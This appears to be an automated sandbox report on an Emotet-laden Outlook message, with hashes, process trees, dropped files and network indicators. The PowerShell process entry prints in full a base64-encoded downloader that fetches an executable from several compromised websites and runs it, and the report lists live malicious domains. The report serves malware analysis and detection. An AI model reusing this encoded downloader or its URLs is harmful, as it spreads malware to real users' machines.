File name: | Re VersicherungsvertrДge; hier DO.msg |
Full analysis: | https://app.any.run/tasks/f0cd547d-6e34-48ad-bbbe-407d54007048 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | June 19, 2019, 12:54:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-outlook |
File info: | CDFV2 Microsoft Outlook Message |
MD5: | B0D284F5C473D592F3D3A04C2EF63B2B |
SHA1: | 16AE1394A00C66CFFD64BDEC3D438AB9A3FE3338 |
SHA256: | BB2095724F3207D266F4FDFC2DE58B1E564B8033BDF9DC465C4735DCE25AE36C |
SSDEEP: | 6144:FI77HUUUUUUUUUUUUUUUUUUUT52Vg1AWI+zy0WDGB:S77HUUUUUUUUUUUUUUUUUUUTCwI+zy0q |
.msg | | | Outlook Message (41.3) |
---|---|---|
.oft | | | Outlook Form Template (24.1) |
.doc | | | Microsoft Word document (18.6) |
.doc | | | Microsoft Word document (old ver.) (11) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2940 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Re VersicherungsvertrДge; hier DO.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
3296 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\3KU2FGAQ\Inf 6205 45687090.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3504 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
312 | powershell -enc JABVADYAOAA0ADMAOAAxADEAPQAnAEgAMgAxADAAOAA5ACcAOwAkAEMANgA1ADYAMAA2AF8AIAA9ACAAJwA5ADkANwAnADsAJABVADgAMwAxADIANgA9ACcAVABfADEAOQA1ADMANgA0ACcAOwAkAEkAMgAzADEAOAAyADIANwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQwA2ADUANgAwADYAXwArACcALgBlAHgAZQAnADsAJAByADEANAA4ADEAMwA2AD0AJwBCADcAOAA5ADAAMAAwACcAOwAkAHEANgAwADQANgBfADUANwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAEUAYABCAGAAYwBMAGkAZQBuAHQAOwAkAEcAMAAyADIAOQA0ADcANgA9ACcAaAB0AHQAcABzADoALwAvAHQAZQBjAG4AbwBsAG8AZwBpAGEAbwBmAGkAYwBpAGEAbAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AYgByADgAMwAvAEAAaAB0AHQAcAA6AC8ALwBlAHYAYQBtAG8AdABlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AbAAwADcAYgBwADgANAA4ADUALwBAAGgAdAB0AHAAOgAvAC8AdABlAHIAbQBpAG4AYQBsAC0AaABlAGEAdgBlAG4ALgBjAG8AbQAvADIAMAAwADYALwB3ADUAMQB6ADgANwAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGgAdQB6AHUAcgB1AG4AawBhAGwAYgBpAC4AbgBlAHQALwB3AHAALQBhAGQAbQBpAG4ALwAwAG0AaAA0ADcANQAvAEAAaAB0AHQAcABzADoALwAvAHIAZQBnAGkAZwBvAHMAYwBvAHIAaQBuAGcALgBjAG8AbQAvADcAYgAwAG8AZQB3AGUALwAzADIAZgBmAGQAMwA5AC8AJwAuAHMAUABMAEkAVAAoACcAQAAnACkAOwAkAEoANQA3ADkANQBfAD0AJwB1ADMAOQBfADYANgAnADsAZgBvAHIAZQBhAGMAaAAoACQASwA5ADUAXwAzADUAOQA1ACAAaQBuACAAJABHADAAMgAyADkANAA3ADYAKQB7AHQAcgB5AHsAJABxADYAMAA0ADYAXwA1ADcALgBEAE8AVwBuAEwAbwBBAEQAZgBpAEwAZQAoACQASwA5ADUAXwAzADUAOQA1ACwAIAAkAEkAMgAzADEAOAAyADIANwApADsAJABJADYAMAA4ADcAMQA9ACcAdwA5ADIAOAAzADIAXwA3ACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQASQAyADMAMQA4ADIAMgA3ACkALgBMAGUAbgBHAFQASAAgAC0AZwBlACAAMwA5ADcAOQA5ACkAIAB7AC4AKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEkAMgAzADEAOAAyADIANwA7ACQAQgAwADEAOAA0ADEAPQAnAE4ANQA2ADYAMQA1ACcAOwBiAHIAZQBhAGsAOwAkAFIAXwA2ADgAMgAwADcAMAA9ACcAQQAwADgANAAyAF8AMwA0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAMAA2ADcANwA4ADMAPQAnAEsAMQAzADgANQA3ADcAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2940 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRDC3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2940 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\3KU2FGAQ\Inf 6205 45687090 (2).doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR897B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_3EEA9CB3-A27C-410B-9ED0-FFA91A361BAE.0\274A1DC6.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2940 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:A7EF8876F2E524F39BFA03CFEB2D9DBC | SHA256:0D9D51E66A5C7EFAE114417FD256BF52ED1DE61C673281AFD25EBD20B8CBAE5F | |||
3504 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_3EEA9CB3-A27C-410B-9ED0-FFA91A361BAE.0\DF6107B0.wmf | wmf | |
MD5:60D8E1E1C7F8EC9AFFBA257A1CC33C34 | SHA256:62933D4B20488355538F68B4F890CB0FF4D358D93CD000C26239A65DA3156A18 | |||
3296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_3EEA9CB3-A27C-410B-9ED0-FFA91A361BAE.0\274A1DC6.doc | document | |
MD5:C105BFCF60DB3FC10ACE57D1A47D0BA7 | SHA256:206D23DE3EB99647646465FD66E1796F9081EB86E5AF4564F415AE5FD3B7F719 | |||
2940 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_Calendar_2_F968E371D07C6345813E4F67F87329D8.dat | xml | |
MD5:B21ED3BD946332FF6EBC41A87776C6BB | SHA256:B1AAC4E817CD10670B785EF8E5523C4A883F44138E50486987DC73054A46F6F4 | |||
2940 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_WorkHours_1_4B703348AAB27141818740C9742D07BA.dat | xml | |
MD5:807EF0FC900FEB3DA82927990083D6E7 | SHA256:4411E7DC978011222764943081500FFF0E43CBF7CCD44264BD1AB6306CA68913 | |||
2940 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\3KU2FGAQ\Inf 6205 45687090.doc | document | |
MD5:C105BFCF60DB3FC10ACE57D1A47D0BA7 | SHA256:206D23DE3EB99647646465FD66E1796F9081EB86E5AF4564F415AE5FD3B7F719 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2940 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
312 | powershell.exe | GET | 404 | 198.2.196.29:80 | http://evamote.com/wp-content/l07bp8485/ | CN | html | 338 b | unknown |
312 | powershell.exe | GET | 404 | 202.181.99.31:80 | http://terminal-heaven.com/2006/w51z87/ | JP | html | 210 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2940 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
312 | powershell.exe | 104.28.6.23:443 | tecnologiaoficial.com | Cloudflare Inc | US | shared |
312 | powershell.exe | 206.72.205.242:443 | regigoscoring.com | NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC | US | unknown |
312 | powershell.exe | 202.181.99.31:80 | terminal-heaven.com | SAKURA Internet Inc. | JP | suspicious |
312 | powershell.exe | 198.2.196.29:80 | evamote.com | PEG TECH INC | CN | unknown |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
tecnologiaoficial.com |
| malicious |
evamote.com |
| unknown |
terminal-heaven.com |
| suspicious |
www.huzurunkalbi.net |
| suspicious |
regigoscoring.com |
| unknown |